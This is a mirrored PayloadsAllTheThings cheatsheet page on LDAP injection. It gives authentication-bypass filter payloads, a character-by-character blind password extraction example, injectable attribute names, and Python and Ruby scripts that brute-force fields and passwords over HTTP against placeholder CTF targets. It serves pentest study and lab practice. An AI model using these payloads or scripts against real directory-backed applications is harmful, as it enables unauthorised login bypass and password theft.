daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (6963B)


      1 ---
      2 title: "LDAP Injection"
      3 topic: "LDAP Injection"
      4 topicSlug: "ldap-injection"
      5 sourcePath: "LDAP Injection/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/LDAP%20Injection/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # LDAP Injection
     12 
     13 > LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.
     14 
     15 ## Summary
     16 
     17 * [Methodology](#methodology)
     18     * [Authentication Bypass](#authentication-bypass)
     19     * [Blind Exploitation](#blind-exploitation)
     20 * [Defaults Attributes](#defaults-attributes)
     21 * [Exploiting userPassword Attribute](#exploiting-userpassword-attribute)
     22 * [Scripts](#scripts)
     23     * [Discover Valid LDAP Fields](#discover-valid-ldap-fields)
     24     * [Special Blind LDAP Injection](#special-blind-ldap-injection)
     25 * [Labs](#labs)
     26 * [References](#references)
     27 
     28 ## Methodology
     29 
     30 LDAP Injection is a vulnerability that occurs when user-supplied input is used to construct LDAP queries without proper sanitization or escaping
     31 
     32 ### Authentication Bypass
     33 
     34 Attempt to manipulate the filter logic by injecting always-true conditions.
     35 
     36 **Example 1**: This LDAP query exploits logical operators in the query structure to potentially bypass authentication
     37 
     38 ```sql
     39 user  = *)(uid=*))(|(uid=*
     40 pass  = password
     41 query = (&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))
     42 ```
     43 
     44 **Example 2**: This LDAP query exploits logical operators in the query structure to potentially bypass authentication
     45 
     46 ```sql
     47 user  = admin)(!(&(1=0
     48 pass  = q))
     49 query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
     50 ```
     51 
     52 ### Blind Exploitation
     53 
     54 This scenario demonstrates LDAP blind exploitation using a technique similar to binary search or character-based brute-forcing to discover sensitive information like passwords. It relies on the fact that LDAP filters respond differently to queries based on whether the conditions match or not, without directly revealing the actual password.
     55 
     56 ```sql
     57 (&(sn=administrator)(password=*))    : OK
     58 (&(sn=administrator)(password=A*))   : KO
     59 (&(sn=administrator)(password=B*))   : KO
     60 ...
     61 (&(sn=administrator)(password=M*))   : OK
     62 (&(sn=administrator)(password=MA*))  : KO
     63 (&(sn=administrator)(password=MB*))  : KO
     64 ...
     65 (&(sn=administrator)(password=MY*))  : OK
     66 (&(sn=administrator)(password=MYA*)) : KO
     67 (&(sn=administrator)(password=MYB*)) : KO
     68 (&(sn=administrator)(password=MYC*)) : KO
     69 ...
     70 (&(sn=administrator)(password=MYK*)) : OK
     71 (&(sn=administrator)(password=MYKE)) : OK
     72 ```
     73 
     74 **LDAP Filter Breakdown**:
     75 
     76 * `&`: Logical AND operator, meaning all conditions inside must be true.
     77 * `(sn=administrator)`: Matches entries where the sn (surname) attribute is administrator.
     78 * `(password=X*)`: Matches entries where the password starts with X (case-sensitive). The asterisk (*) is a wildcard, representing any remaining characters.
     79 
     80 ## Defaults Attributes
     81 
     82 Can be used in an injection like `*)(ATTRIBUTE_HERE=*`
     83 
     84 ```bash
     85 userPassword
     86 surname
     87 name
     88 cn
     89 sn
     90 objectClass
     91 mail
     92 givenName
     93 commonName
     94 ```
     95 
     96 ## Exploiting userPassword Attribute
     97 
     98 `userPassword` attribute is not a string like the `cn` attribute for example but it’s an OCTET STRING
     99 In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18).
    100 
    101 > octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit.
    102 
    103 ```bash
    104 userPassword:2.5.13.18:=\xx (\xx is a byte)
    105 userPassword:2.5.13.18:=\xx\xx
    106 userPassword:2.5.13.18:=\xx\xx\xx
    107 ```
    108 
    109 ## Scripts
    110 
    111 ### Discover Valid LDAP Fields
    112 
    113 ```python
    114 #!/usr/bin/python3
    115 import requests
    116 import string
    117 
    118 fields = []
    119 url = 'https://URL.com/'
    120 f = open('dic', 'r')
    121 world = f.read().split('\n')
    122 f.close()
    123 
    124 for i in world:
    125     r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (&(login=*)(ITER_VAL=*))\x00)(password=bla))
    126     if 'TRUE CONDITION' in r.text:
    127         fields.append(str(i))
    128 
    129 print(fields)
    130 ```
    131 
    132 ### Special Blind LDAP Injection
    133 
    134 ```python
    135 #!/usr/bin/python3
    136 import requests, string
    137 alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
    138 
    139 flag = ""
    140 for i in range(50):
    141     print("[i] Looking for number " + str(i))
    142     for char in alphabet:
    143         r = requests.get("http://ctf.web?action=dir&search=admin*)(password=" + flag + char)
    144         if ("TRUE CONDITION" in r.text):
    145             flag += char
    146             print("[+] Flag: " + flag)
    147             break
    148 ```
    149 
    150 Exploitation script by [@noraj](https://github.com/noraj)
    151 
    152 ```ruby
    153 #!/usr/bin/env ruby
    154 require 'net/http'
    155 alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('')
    156 
    157 flag = ''
    158 (0..50).each do |i|
    159   puts("[i] Looking for number #{i}")
    160   alphabet.each do |char|
    161     r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}"))
    162     if /TRUE CONDITION/.match?(r)
    163       flag += char
    164       puts("[+] Flag: #{flag}")
    165       break
    166     end
    167   end
    168 end
    169 ```
    170 
    171 ## Labs
    172 
    173 * [Root Me - LDAP injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/LDAP-injection-Authentication)
    174 * [Root Me - LDAP injection - Blind](https://www.root-me.org/en/Challenges/Web-Server/LDAP-injection-Blind)
    175 
    176 ## References
    177 
    178 * [[European Cyber Week] - AdmYSion - Alan Marrec (Maki) - January 14, 2025](https://web.archive.org/web/20250114083154/https://www.maki.bzh/writeups/ecw2018admyssion/)
    179 * [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN - October 31, 2018](https://web.archive.org/web/20200924103615/https://0xukn.fr/posts/writeupecw2018admyssion/)
    180 * [How To Configure OpenLDAP and Perform Administrative LDAP Tasks - Justin Ellingwood - May 30, 2015](https://web.archive.org/web/20260119175101/https://www.digitalocean.com/community/tutorials/how-to-configure-openldap-and-perform-administrative-ldap-tasks)
    181 * [How To Manage and Use LDAP Servers with OpenLDAP Utilities - Justin Ellingwood - May 29, 2015](https://web.archive.org/web/20160305121823/https://www.digitalocean.com/community/tutorials/how-to-manage-and-use-ldap-servers-with-openldap-utilities)
    182 * [LDAP Blind Explorer - Alonso Parada - August 12, 2011](https://web.archive.org/web/20160120073444/https://code.google.com/p/ldap-blind-explorer/)
    183 * [LDAP Injection & Blind LDAP Injection - Chema Alonso, José Parada Gimeno - October 10, 2008](https://web.archive.org/web/20081010181534/http://blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf)
    184 * [LDAP Injection Prevention Cheat Sheet - OWASP - July 16, 2019](https://web.archive.org/web/20190719164052/https://www.owasp.org/index.php/LDAP_injection)